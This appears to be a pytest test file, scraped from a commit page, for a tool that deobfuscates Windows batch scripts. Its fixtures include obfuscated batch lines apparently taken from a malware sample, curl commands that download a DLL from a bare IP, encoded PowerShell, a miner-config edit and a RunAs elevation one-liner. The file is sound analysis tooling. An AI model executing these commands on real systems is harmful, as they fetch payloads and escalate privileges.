    definition = "%os:~-4,1%%comspec:~-1,1%%comspec:~14,1%%commonprogramfiles:~-6,1%'=^^^1^^^\\^^^)%comspec:~-13,1%u^^^,^^^%pathext:~31,1%b^^^8%commonprogramfiles:~9,1%^^^^^^^/v^^^&^^^U%os:~-9,1%^^^%pathext:~6,1%k%programfiles:~-12,1%p^^^[^^^*^^^@^^^~%programfiles:~-8,1%^^^%pathext:~11,1%q%comspec:~-14,1%^^^%commonprogramfiles:~24,1%^^^R^^^%pathext:~12,1%^^^0f^^^I^^^%comspec:~-9,1%^^^{^^^$%comspec:~-7,1%^^^K%programfiles:~-2,1%^^^7^^^9z%commonprogramfiles:~-11,1%^^^G^^^%os:~9,1%^^^L^^^=^^^(%commonprogramfiles:~-16,1%^^^%commonprogramfiles:~-12,1%h%comspec:~-15,1%^^^6^^^%commonprogramfiles:~10,1%^^^\"^^^Q^^^_^^^%pathext:~2,1%j^^^`%commonprogramfiles:~6,1%^^^Y^^^]^^^+^^^%pathext:~18,1%^^^-^^^%pathext:~26,1%^^^|^^^%comspec:~17,1%^^^%pathext:~7,1%^^^<%commonprogramfiles:~22,1%^^^%pathext:~17,1%^^^;^^^%os:~-10,1%^^^%os:~8,1%^^^%pathext:~41,1%^^^>^^^}^^^#^^^'%os:~-7,1%^^^.^^^5%os:~5,1%^^^4^^^:^^^%programfiles:~3,1%^^^%pathext:~47,1%%comspec:~25,1%^^^?^^^Z"  # noqa: E501
    interpreter.interpret_command(interpreter.normalize_command(definition))
    assert interpreter.variables["'"].startswith("^1^\\^)tu^")

    # Three single-character slices of ' spell out "set".
    spelled = interpreter.normalize_command("%':~43,1%%':~-96,1%%':~6,1%")
    assert spelled == "set"

    # The whole line is normalized first, then split, and every resulting
    # command is normalized again before being interpreted.
    chained = "echo AAA%':~-138,1%%':~43,1%%':~-96,1%%':~6,1%%':~89,1%%':~-20,1%%':~-82,1%abbbc%':~-138,1%set mj=kx"
    expanded = interpreter.normalize_command(chained)
    for command in interpreter.get_commands(expanded):
        interpreter.interpret_command(interpreter.normalize_command(command))
    assert interpreter.variables["'"] == "abbbc"
340+
341+
@staticmethod
@pytest.mark.parametrize(
    "cmd, result",
    [
        ("echo %0", "echo script.bat"),
        ("echo %1", "echo "),
        ("echo %~0", "echo script.bat"),
        ("echo %~1", "echo "),
        ("echo %~s0", "echo script.bat"),
        ("echo %~s1", "echo "),
        ("echo %~f0", "echo script.bat"),
        ("echo %~f1", "echo "),
        ("echo %~d0", "echo script.bat"),
        ("echo %~d1", "echo "),
        ("echo %~p0", "echo script.bat"),
        ("echo %~p1", "echo "),
        ("echo %~z0", "echo script.bat"),
        ("echo %~z1", "echo "),
        ("echo %~a0", "echo script.bat"),
        ("echo %~a1", "echo "),
        # ("echo %~xsa0", "echo script.bat"),
        # ("echo %~xsa1", "echo "),
        ("echo %3c%3%A", "echo cA"),
        ("echo %3c%3%A%", "echo c"),
        ("echo %*", "echo "),
        ("echo %*a", "echo a"),
    ],
)
def test_args(cmd, result):
    """Positional arguments: ``%0`` forms give ``script.bat``, the others expand to nothing."""
    interpreter = BatchDeobfuscator()

    assert interpreter.normalize_command(cmd) == result
374+
375+
@staticmethod
def test_args_with_var():
    """Positional arguments and a regular variable mixed in the same command."""
    interpreter = BatchDeobfuscator()
    interpreter.interpret_command("set A=123")

    # %3 expands to nothing twice, leaving the literal "c" followed by %A%.
    assert interpreter.normalize_command("echo %3c%3%A%") == "echo c123"

    # %0 is consumed first, so %A% is still recognized afterwards.
    assert interpreter.normalize_command("echo %0%A%") == "echo script.bat123"
389+
390+
@staticmethod
391+
def test_single_quote_var_name_rewrite_2():
392+
# Taken from 8d20c8a8104f29e7ec2ff158103fa73d3e9d357b646e2ff0487b880ab6462643
393+
deobfuscator = BatchDeobfuscator()
394+
395+
cmd = "%os:~-4,1%%comspec:~-1,1%%comspec:~14,1%%commonprogramfiles:~-6,1%'=^^^1^^^\\^^^)%comspec:~-13,1%u^^^,^^^%pathext:~31,1%b^^^8%commonprogramfiles:~9,1%^^^^^^^/v^^^&^^^U%os:~-9,1%^^^%pathext:~6,1%k%programfiles:~-12,1%p^^^[^^^*^^^@^^^~%programfiles:~-8,1%^^^%pathext:~11,1%q%comspec:~-14,1%^^^%commonprogramfiles:~24,1%^^^R^^^%pathext:~12,1%^^^0f^^^I^^^%comspec:~-9,1%^^^{^^^$%comspec:~-7,1%^^^K%programfiles:~-2,1%^^^7^^^9z%commonprogramfiles:~-11,1%^^^G^^^%os:~9,1%^^^L^^^=^^^(%commonprogramfiles:~-16,1%^^^%commonprogramfiles:~-12,1%h%comspec:~-15,1%^^^6^^^%commonprogramfiles:~10,1%^^^\"^^^Q^^^_^^^%pathext:~2,1%j^^^`%commonprogramfiles:~6,1%^^^Y^^^]^^^+^^^%pathext:~18,1%^^^-^^^%pathext:~26,1%^^^|^^^%comspec:~17,1%^^^%pathext:~7,1%^^^<%commonprogramfiles:~22,1%^^^%pathext:~17,1%^^^;^^^%os:~-10,1%^^^%os:~8,1%^^^%pathext:~41,1%^^^>^^^}^^^#^^^'%os:~-7,1%^^^.^^^5%os:~5,1%^^^4^^^:^^^%programfiles:~3,1%^^^%pathext:~47,1%%comspec:~25,1%^^^?^^^Z" # noqa: E501
396+
cmd2 = deobfuscator.normalize_command(cmd)
397+
deobfuscator.interpret_command(cmd2)
398+
399+
cmd = "%':~-124,1%%':~43,1%%':~-96,1%%':~6,1%%':~89,1%%':~-20,1%%':~-82,1%%':~17,1%%':~-69,1%%':~134,1%%':~122,1%%':~7,1%%':~-79,1%%':~-138,1%%':~36,1%%':~-117,1%%':~-96,1%%':~-154,1%%':~-71,1%%':~-67,1%%':~54,1%%':~-67,1%%':~-121,1%%':~154,1%%':~78,1%%':~130,1%%':~-132,1%%':~-138,1%%':~-124,1%%':~-117,1%%':~64,1%%':~6,1%%':~89,1%%':~12,1%%':~47,1%%':~42,1%%':~-96,1%%':~28,1%%':~78,1%%':~15,1%%':~24,1%%':~-132,1%%':~39,1%%':~47,1%%':~22,1%%':~-124,1%%':~25,1%%':~52,1%%':~-71,1%!'!%':~89,1%%':~122,1%%':~64,1%%':~-118,1%%':~89,1%%':~-143,1%%':~-69,1%%':~89,1%%':~80,1%%':~-124,1%%':~-96,1%%':~-99,1%%':~84,1%%':~70,1%%':~143,1%%':~-26,1%%0 %':~-138,1%%':~36,1%%':~43,1%%':~-96,1%%':~-154,1%%':~-71,1%%':~103,1%%':~20,1%%':~-130,1%%':~-36,1%%':~78,1%%':~45,1%%':~-149,1%%':~-106,1%%':~22,1%%':~36,1%%':~-117,1%%':~84,1%%':~-153,1%%':~6,1%%':~141,1%%':~-90,1%%':~-14,1%%':~122,1%%':~-71,1%%':~19,1%%':~43,1%%':~89,1%%':~-141,1%%':~-108,1%%':~-71,1%%':~19,1%%':~-154,1%%':~89,1%%':~51,1%%':~22,1%%':~36,1%%':~-96,1%%':~-5,1%%':~-135,1%%':~6,1%%':~5,1%%':~-71,1%%':~-96,1%%':~81,1%%':~-117,1%%':~64,1%%':~-71,1%%':~80,1%%':~36,1%%':~-99,1%%':~-79,1%%':~-117,1%%':~-155,1%%':~22,1%%':~36,1%%':~-96,1%%':~-38,1%%':~-19,1%%':~-79,1%%':~70,1%%':~-99,1%%':~39,1%%':~81,1%%':~-138,1%%':~36,1%%':~-117,1%%':~64,1%%':~-154,1%%':~89,1%%':~-113,1%%':~42,1%%':~98,1%%':~-82,1%%':~12,1%%':~24,1%%':~15,1%%':~-149,1%%':~22,1%%':~36,1%%':~43,1%%':~-96,1%%':~-154,1%%':~89,1%%':~-20,1%%':~-82,1%%':~-79,1%%':~17,1%%':~17,1%%':~17,1%%':~-28,1%%':~61,1%%':~-143,1%%':~17,1%%':~17,1%%':~-94,1%%':~-143,1%%':~-143,1%%':~-143,1%%':~-63,1%%':~17,1%%':~-143,1%%':~17,1%%':~87,1%%':~-14,1%%':~17,1%%':~17,1%%':~17,1%%':~124,1%%':~141,1%%':~-143,1%%':~17,1%%':~-143,1%%':~138,1%%':~17,1%%':~17,1%%':~17,1%%':~36,1%%':~-143,1%%':~17,1%%':~17,1%%':~-100,1%%':~-143,1%%':~17,1%%':~17,1%%':~-136,1%%':~17,1%%':~17,1%%':~17,1%%':~-34,1%%':~-143,1%%':~-143,1%%':~-143,1%%':~95,1%%':~-143,1%%':~-143,1%%':~-143,1%%':~-88,1%%':~-143
,1%%':~-143,1%%':~17,1%%':~148,1%%':~17,1%%':~17,1%%':~17,1%%':~113,1%%':~17,1%%':~17,1%%':~-143,1%%':~111,1%%':~17,1%%':~17,1%%':~-143,1%%':~-60,1%%':~12,1%%':~17,1%%':~-143,1%%':~-143,1%%':~-17,1%%':~17,1%%':~17,1%%':~17,1%%':~5,1%%':~28,1%%':~-143,1%%':~-143,1%%':~17,1%%':~80,1%%':~17,1%%':~-143,1%%':~17,1%%':~91,1%%':~-130,1%%':~-143,1%%':~17,1%%':~17,1%%':~157,1%%':~70,1%%':~17,1%%':~-143,1%%':~17,1%%':~-138,1%%':~39,1%%':~-143,1%%':~-143,1%%':~17,1%%':~-84,1%%':~17,1%%':~-143,1%%':~-143,1%%':~121,1%%':~-153,1%%':~-143,1%%':~-143,1%%':~-143,1%%':~109,1%%':~-143,1%%':~-143,1%%':~17,1%%':~58,1%%':~-143,1%%':~17,1%%':~17,1%%':~-41,1%%':~-143,1%%':~17,1%%':~17,1%%':~-15,1%%':~-143,1%%':~17,1%%':~17,1%%':~-104,1%%':~17,1%%':~17,1%%':~17,1%%':~17,1%%':~17,1%%':~17,1%%':~-143,1%%':~-57,1%%':~52,1%%':~-145,1%%':~-143,1%%':~17,1%%':~-143,1%%':~128,1%%':~-143,1%%':~-143,1%%':~-143,1%%':~115,1%%':~17,1%%':~-143,1%%':~-143,1%%':~38,1%%':~98,1%%':~-143,1%%':~-143,1%%':~-143,1%%':~-119,1%%':~-143,1%%':~-143,1%%':~17,1%%':~74,1%%':~17,1%%':~17,1%%':~-143,1%%':~-67,1%%':~42,1%%':~-143,1%%':~17,1%%':~17,1%%':~-8,1%%':~17,1%%':~-143,1%%':~-143,1%%':~51,1%%':~85,1%%':~-135,1%%':~-143,1%%':~17,1%%':~17,1%%':~105,1%%':~-91,1%%':~17,1%%':~17,1%%':~17,1%%':~-128,1%%':~-140,1%%':~-143,1%%':~17,1%%':~17,1%%':~-106,1%%':~-117,1%%':~17,1%%':~-143,1%%':~17,1%%':~159,1%%':~17,1%%':~-143,1%%':~-143,1%%':~49,1%%':~17,1%%':~-143,1%%':~-143,1%%':~-133,1%%':~-143,1%%':~-143,1%%':~-143,1%%':~3,1%%':~-143,1%%':~17,1%%':~17,1%%':~68,1%%':~-143,1%%':~17,1%%':~-143,1%%':~-141,1%%':~-154,1%%':~17,1%%':~-143,1%%':~-143,1%%':~154,1%%':~-143,1%%':~-143,1%%':~17,1%%':~-71,1%%':~17,1%%':~-143,1%%':~17,1%%':~107,1%%':~-96,1%%':~101,1%%':~-76,1%%':~-143,1%%':~17,1%%':~17,1%%':~-20,1%%':~-131,1%%':~17,1%%':~17,1%%':~-143,1%%':~78,1%%':~155,1%%':~17,1%%':~-143,1%%':~17,1%%':~-26,1%%':~-143,1%%':~17,1%%':~-143,1%%':~63,1%%':~17,1%%':~-143,1%%':~-143,1%%':~-151,1%%':~17,1%%':~17,1%%':~17,1%%':~83,1%%':~-143,1%%
':~17,1%%':~17,1%%':~-113,1%%':~-143,1%%':~17,1%%':~-143,1%%':~-10,1%%':~17,1%%':~17,1%%':~17,1%%':~-24,1%%':~17,1%%':~17,1%%':~17,1%%':~11,1%%':~122,1%%':~-143,1%%':~17,1%%':~-143,1%%':~-159,1%%':~-143,1%%':~17,1%%':~-143,1%%':~-146,1%%':~-143,1%%':~17,1%%':~17,1%%':~-43,1%%':~17,1%%':~-143,1%%':~17,1%%':~130,1%%':~17,1%%':~17,1%%':~-143,1%%':~-115,1%%':~-143,1%%':~17,1%%':~17,1%%':~34,1%%':~22,1%%':~-124,1%%':~43,1%%':~-96,1%%':~-154,1%%':~89,1%%':~-145,1%%':~98,1%%':~-82,1%%':~-5,1%%':~42,1%%':~-138,1%%':~36,1%%':~-117,1%%':~64,1%%':~6,1%%':~89,1%%':~-8,1%%':~97,1%%':~47,1%%':~132,1%%':~27,1%%':~78,1%%':~83,1%%':~-140,1%%':~39,1%%':~-32,1%%':~-118,1%%':~22,1%%':~-124,1%%':~-117,1%%':~64,1%%':~-154,1%%':~-79,1%%':~70,1%%':~61,1%%':~39,1%%':~-79,1%%':~89,1%%':~-96,1%%':~-38,1%%':~-121,1%%':~-148,1%%':~81,1%%':~64,1%%':~141,1%%':~64,1%%':~81,1%%':~-121,1%%':~85,1%%':~64,1%%':~141,1%%':~64,1%%':~-5,1%%':~30,1%%':~-121,1%%':~122,1%%':~43,1%%':~-135,1%%':~-90,1%%':~-38,1%%':~22,1%%':~-96,1%%':~-38,1%%':~-19,1%%':~-79,1%%':~-99,1%%':~-90,1%%':~-121,1%%':~-79,1%%':~89,1%%':~56,1%%':~134,1%%':~-38,1%%':~7,1%%':~81,1%%':~-138,1%%':~-138,1%%':~36,1%%':~64,1%%':~61,1%%':~84,1%%':~-90,1%%':~143,1%%':~134,1%%0 
%':~-138,1%%':~-138,1%%':~36,1%%':~-117,1%%':~64,1%%':~6,1%%':~89,1%%':~-130,1%%':~-30,1%%':~-76,1%%':~69,1%%':~-82,1%%':~-136,1%%':~85,1%%':~-138,1%%':~36,1%%':~43,1%%':~64,1%%':~-154,1%%':~89,1%%':~-36,1%%':~39,1%%':~27,1%%':~70,1%%':~78,1%%':~119,1%%':~61,1%%':~20,1%%':~-138,1%%':~-124,1%%':~-117,1%%':~64,1%%':~-154,1%%':~-71,1%%':~85,1%%':~-91,1%%':~72,1%%':~78,1%%':~119,1%%':~63,1%%':~-5,1%%':~22,1%%':~36,1%%':~-117,1%%':~-76,1%%':~-153,1%%':~-154,1%%':~-19,1%%':~70,1%%':~-14,1%%':~-38,1%%':~89,1%%':~-141,1%%':~43,1%%':~-71,1%%':~-141,1%%':~52,1%%':~89,1%%':~19,1%%':~-154,1%%':~89,1%%':~51,1%%':~-138,1%%':~22,1%%':~36,1%%':~-117,1%%':~64,1%%':~6,1%%':~89,1%%':~7,1%%':~119,1%%':~-88,1%%':~-106,1%%':~72,1%%':~-82,1%%':~-77,1%%':~-153,1%%':~-138,1%%':~-124,1%%':~64,1%%':~-5,1%%':~-135,1%%':~-154,1%%':~22,1%%':~22,1%%':~-124,1%%':~64,1%%':~-99,1%%':~84,1%%':~70,1%%':~-71,1%%':~-69,1%" # noqa: E501
400+
cmd2 = deobfuscator.normalize_command(cmd)
401+
for cmd3 in deobfuscator.get_commands(cmd2):
402+
cmd4 = deobfuscator.normalize_command(cmd3)
403+
deobfuscator.interpret_command(cmd4)
404+
405+
assert deobfuscator.variables["'"].endswith("^N^F^*")
406+
407+
@staticmethod
def test_special_char_var_name():
    """A non-ASCII variable name (``ò``) can be set and sliced like any other."""
    interpreter = BatchDeobfuscator()

    alphabet = '@set "ò=BbQw2 1zUta9gCFolxZSYMRJ8jE6ITy7V@md3K0XDkvWr5PN4uecHqpLnOisAfGh"'
    interpreter.interpret_command(interpreter.normalize_command(alphabet))

    sliced = "%ò:~33,1%%ò:~50,1%%ò:~51,1%%ò:~63,1%%ò:~15,1%%ò:~5,1%%ò:~15,1%%ò:~61,1%%ò:~61,1%"
    assert interpreter.normalize_command(sliced) == "@echo off"
417+
418+
@staticmethod
def test_rem_skip():
    """Variables expand inside `echo`, but a `REM` line is returned unchanged."""
    deobfuscator = BatchDeobfuscator()

    # Define the variable that the following lines reference.
    define_var = deobfuscator.normalize_command("set EXP=value")
    deobfuscator.interpret_command(define_var)

    # A regular command gets its %EXP% reference substituted.
    echoed = deobfuscator.normalize_command("echo *%EXP%*")
    deobfuscator.interpret_command(echoed)
    assert echoed == "echo *value*"

    # The same text behind REM must come back exactly as written.
    remark = "REM echo *%EXP%*"
    normalized_remark = deobfuscator.normalize_command(remark)
    deobfuscator.interpret_command(normalized_remark)
    assert normalized_remark == remark
437+
438+
@staticmethod
def test_fun_var_replace():
    """`%var%` expands and `%var:old=new%` substitutes within the expanded value."""
    deobfuscator = BatchDeobfuscator()

    # (input, expected normalized output), checked in order.
    expectations = (
        ("%comspec%", "C:\\WINDOWS\\system32\\cmd.exe"),
        ("%comspec:cmd=powershell%", "C:\\WINDOWS\\system32\\powershell.exe"),
    )
    for raw, expected in expectations:
        normalized = deobfuscator.normalize_command(raw)
        assert normalized == expected
449+
450+
@staticmethod
@pytest.mark.skip(reason="TODO: deobfuscation of these CMD-DeObfuscator patterns still needs improvement")
def test_bobbystacksmash():
    """Check normalization against examples from bobbystacksmash's CMD-DeObfuscator.

    Currently skipped: the assertions below describe the desired output for
    empty-string removal, string widening and path resolution.
    """
    # TODO: Improve deobfuscation
    # Some examples taken from https://github.com/bobbystacksmash/CMD-DeObfuscator
    deobfuscator = BatchDeobfuscator()

    # Empty string removal
    # https://github.com/bobbystacksmash/CMD-DeObfuscator#empty-string-removal
    cmd = 'pow""ersh""ell'
    cmd2 = deobfuscator.normalize_command(cmd)
    assert cmd2 == "powershell"

    # String widening
    # https://github.com/bobbystacksmash/CMD-DeObfuscator#string-widening
    cmd = 'w"s"c"r"i"p"t'
    cmd2 = deobfuscator.normalize_command(cmd)
    assert cmd2 == "wscript"

    # Path resolver
    # https://github.com/bobbystacksmash/CMD-DeObfuscator#path-resolver-coming-soon
    cmd = "C:\\foo\\bar\\baz\\..\\..\\..\\Windows\\System32\\cmd.exe"
    cmd2 = deobfuscator.normalize_command(cmd)
    assert cmd2 == "C:\\Windows\\System32\\cmd.exe"
474+
475+
@staticmethod
def test_for():
    """`get_commands` splits a one-line `for` loop into header, body and closing paren."""
    deobfuscator = BatchDeobfuscator()
    one_liner = "for /l %%x in (1, 1, 10) do echo %%x"

    # Materialize the result so it can be compared as a whole list.
    commands = list(deobfuscator.get_commands(one_liner))

    # The list equality also pins the expected length of three.
    assert commands == ["for /l %%x in (1, 1, 10) do (", "echo %%x", ")"]
482+
483+
@staticmethod
@pytest.mark.parametrize(
    "cmd, download_trait",
    [
        # -O: destination is taken from the URL's file name.
        (
            "curl.exe -LO https://www.7-zip.org/a/7z1805-x64.exe",
            {"src": "https://www.7-zip.org/a/7z1805-x64.exe", "dst": "7z1805-x64.exe"},
        ),
        # -o given before the URL.
        (
            "curl.exe -o C:\\ProgramData\\output\\output.file 1.1.1.1/file.dat",
            {"src": "1.1.1.1/file.dat", "dst": "C:\\ProgramData\\output\\output.file"},
        ),
        # URL wrapped in doubled double quotes, -o given after it.
        (
            'curl ""http://1.1.1.1/zazaz/p~~/Y98g~~/"" -o 9jXqQZQh.dll',
            {"src": "http://1.1.1.1/zazaz/p~~/Y98g~~/", "dst": "9jXqQZQh.dll"},
        ),
    ],
)
def test_interpret_curl(cmd, download_trait):
    """`interpret_curl` records exactly one download trait holding the source and destination."""
    deobfuscator = BatchDeobfuscator()
    deobfuscator.interpret_curl(cmd)

    downloads = deobfuscator.traits["download"]
    assert len(downloads) == 1
    # Index 1 of the recorded entry is the src/dst mapping under test.
    recorded_trait = downloads[-1][1]
    assert recorded_trait == download_trait
506+
507+
@staticmethod
def test_double_double_quote_stripping():
    """A doubled double quote inside a quoted argument is removed by normalization."""
    deobfuscator = BatchDeobfuscator()
    obfuscated = 'cmd /C "pow""ershell -e ZQBjAGgAbwAgACIAVwBpAHoAYQByAGQAIgA="'
    expected = 'cmd /C "powershell -e ZQBjAGgAbwAgACIAVwBpAHoAYQByAGQAIgA="'

    normalized = deobfuscator.normalize_command(obfuscated)
    assert normalized == expected
512+
513+
@staticmethod
@pytest.mark.parametrize(
    "cmd, exec_cmd",
    [
        # Each case uses a different combination of `start` switches.
        ('start /b cmd /c "echo Hi"', ["echo Hi"]),
        ('start /b /i cmd /c "echo Hi"', ["echo Hi"]),
        ('start /w cmd /c "echo Hi"', ["echo Hi"]),
        ('start/B /WAIT cmd /c "echo Hi"', ["echo Hi"]),
        ('start/WAIT /B cmd /c "echo Hi"', ["echo Hi"]),
    ],
)
def test_interpret_start(cmd, exec_cmd):
    """The command passed to `cmd /c` through `start` ends up in `exec_cmd`."""
    deobfuscator = BatchDeobfuscator()
    deobfuscator.interpret_command(cmd)

    # One list comparison checks both the number of entries and each entry in order.
    assert list(deobfuscator.exec_cmd) == exec_cmd
530+
531+
@staticmethod
def test_posix_powershell():
    """Quoted `powershell -Command` payloads are captured in `exec_ps1` as bytes."""
    deobfuscator = BatchDeobfuscator()

    # Case 1: pipeline payload containing backslash-escaped double quotes.
    pipeline_cmd = (
        "powershell -Command \"$out = cat '%USERPROFILE%\\jin\\config.json' | "
        "%%{$_ -replace '\\\"donate-level\\\": *\\d*,', '\\\"donate-level\\\": 1,'} | "
        "Out-String; $out | Out-File -Encoding ASCII '%USERPROFILE%\\jin\\config.json'\" "
    )
    pipeline_payload = (
        b"$out = cat '%USERPROFILE%\\jin\\config.json' | "
        b"%%{$_ -replace '\"donate-level\": *\\d*,', '\"donate-level\": 1,'} | "
        b"Out-String; $out | Out-File -Encoding ASCII '%USERPROFILE%\\jin\\config.json'"
    )
    deobfuscator.interpret_command(pipeline_cmd)
    captured = deobfuscator.exec_ps1
    assert len(captured) == 1
    assert captured[0] == pipeline_payload
    # Reset so the second case is checked in isolation.
    deobfuscator.exec_ps1.clear()

    # Case 2: script block whose argument list embeds an escaped, quoted path.
    elevate_cmd = (
        'powershell -noprofile -command "&{start-process powershell -ArgumentList'
        ' \'-noprofile -file \\"%scriptPath%\\"\' -verb RunAs}"'
    )
    elevate_payload = b"&{start-process powershell -ArgumentList '-noprofile -file \"%scriptPath%\"' -verb RunAs}"
    deobfuscator.interpret_command(elevate_cmd)
    captured = deobfuscator.exec_ps1
    assert len(captured) == 1
    assert captured[0] == elevate_payload
558+
559+
@staticmethod
@pytest.mark.skip(reason="TODO: non-POSIX style PowerShell command lines are not parsed correctly yet")
def test_non_posix_powershell():
    """Check PowerShell command lines that do not follow POSIX quoting rules.

    Currently skipped: both cases are open TODOs around shlex parsing.
    """
    deobfuscator = BatchDeobfuscator()

    # TODO: Find out how to parse this as non-posix with shlex without breaking all other cases
    # What to do with odd number of quotes. Shlex doesn't parse it perfectly.
    cmd = (
        'powershell -Command "Get-AppxPackage -Name "Microsoft.OneDriveSync" > '
        '"%WORKINGDIRONEDRIVE%\\OneDriveSparsePackage.txt" 2>&1'
    )
    deobfuscator.interpret_command(cmd)
    assert len(deobfuscator.exec_ps1) == 1
    # assert deobfuscator.exec_ps1[0] == "Good command (with or without redirection)"
    deobfuscator.exec_ps1.clear()

    # TODO: Find out how to keep the \ from this command and keep posix style commands working
    cmd = r"PowerShell -NoProfile -ExecutionPolicy Bypass -Command C:\ProgramData\x64\ISO\x64.ps1"
    deobfuscator.interpret_command(cmd)
    assert len(deobfuscator.exec_ps1) == 1
    assert deobfuscator.exec_ps1[0] == rb"C:\ProgramData\x64\ISO\x64.ps1"
580+
581+
@staticmethod
def test_anti_recursivity():
    """A self-referencing quote-escaping `set` leaves a quote-free value unchanged."""
    deobfuscator = BatchDeobfuscator()

    # The initial assignment is interpreted directly, without normalization.
    deobfuscator.interpret_command('set "str=a"')

    # Reassign str to itself with every double quote replaced by \".
    escape_quotes = deobfuscator.normalize_command('set "str=!str:"=\\"!"')
    deobfuscator.interpret_command(escape_quotes)

    echoed = deobfuscator.normalize_command("echo %str%")
    assert echoed == "echo a"
595+
596+
@staticmethod
def test_anti_recursivity_with_quotes():
    """A self-referencing quote-escaping `set` escapes the quote embedded in the value."""
    deobfuscator = BatchDeobfuscator()

    # The initial assignment is interpreted directly, without normalization.
    deobfuscator.interpret_command('set "str=a"a"')

    # Reassign str to itself with every double quote replaced by \".
    escape_quotes = deobfuscator.normalize_command('set "str=!str:"=\\"!"')
    deobfuscator.interpret_command(escape_quotes)

    echoed = deobfuscator.normalize_command("echo %str%")
    assert echoed == 'echo a\\"a'

0 commit comments

Comments
 (0)
Please sign in to comment.